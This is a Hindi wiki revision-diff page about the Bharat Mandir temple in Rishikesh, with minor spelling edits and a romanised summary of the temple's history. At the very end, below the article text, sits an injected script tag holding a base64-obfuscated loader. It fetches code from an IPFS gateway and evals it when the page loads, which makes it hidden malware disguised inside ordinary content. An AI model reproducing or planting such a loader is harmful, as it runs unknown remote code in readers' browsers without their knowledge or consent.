Difference between revisions of "भरत मंदिर ऋषिकेश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "गुरू" to "गुरु")
m (Text replace - "महत्वपूर्ण" to "महत्त्वपूर्ण")
Line 3: Line 3:
 
*यह मन्दिर बहुत ही सुंदर है। मंदिर के अंदरूनी गर्भगृह में भगवान [[विष्णु]] की प्रतिमा एकल [[शालिग्राम]] पत्थर पर उकेरी गई है।  
 
*यह मन्दिर बहुत ही सुंदर है। मंदिर के अंदरूनी गर्भगृह में भगवान [[विष्णु]] की प्रतिमा एकल [[शालिग्राम]] पत्थर पर उकेरी गई है।  
 
*भगवान [[राम]] के छोटे भाई [[भरत (दशरथ पुत्र)|भरत]] को समर्पित यह मंदिर [[त्रिवेणी घाट ऋषिकेश|त्रिवेणी घाट]] के निकट ओल्ड टाउन में स्थित है।  
 
*भगवान [[राम]] के छोटे भाई [[भरत (दशरथ पुत्र)|भरत]] को समर्पित यह मंदिर [[त्रिवेणी घाट ऋषिकेश|त्रिवेणी घाट]] के निकट ओल्ड टाउन में स्थित है।  
*मंदिर का मूल रूप 1398 में [[तैमूर आक्रमण]] के दौरान क्षतिग्रस्त कर दिया गया था। हालांकि मंदिर की बहुत सी महत्वपूर्ण चीजों को उस हमले के बाद आज तक संरक्षित रखा गया है।  
+
*मंदिर का मूल रूप 1398 में [[तैमूर आक्रमण]] के दौरान क्षतिग्रस्त कर दिया गया था। हालांकि मंदिर की बहुत सी महत्त्वपूर्ण चीजों को उस हमले के बाद आज तक संरक्षित रखा गया है।  
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{उत्तराखंड के पर्यटन स्थल}}
 
{{उत्तराखंड के पर्यटन स्थल}}

Revision as of 13:42, 4 January 2011

  • gadhaval, uttaraanchal mean himalay parvatoan ke tal mean base rrishikesh ka bharat mandir pramukh paryatan sthal hai.
  • bharat mandir rrishikesh ka sabase prachin mandir hai jise 12 shatabdi mean adi guru shankarachary ne banavaya tha. adi guru shankarachary dvara rakha gaya shriyantr bhi is mandir mean hai.
  • yah mandir bahut hi suandar hai. mandir ke aandarooni garbhagrih mean bhagavan vishnu ki pratima ekal shaligram patthar par ukeri gee hai.
  • bhagavan ram ke chhote bhaee bharat ko samarpit yah mandir triveni ghat ke nikat old taun mean sthit hai.
  • mandir ka mool roop 1398 mean taimoor akraman ke dauran kshatigrast kar diya gaya tha. halaanki mandir ki bahut si mahattvapoorn chijoan ko us hamale ke bad aj tak sanrakshit rakha gaya hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>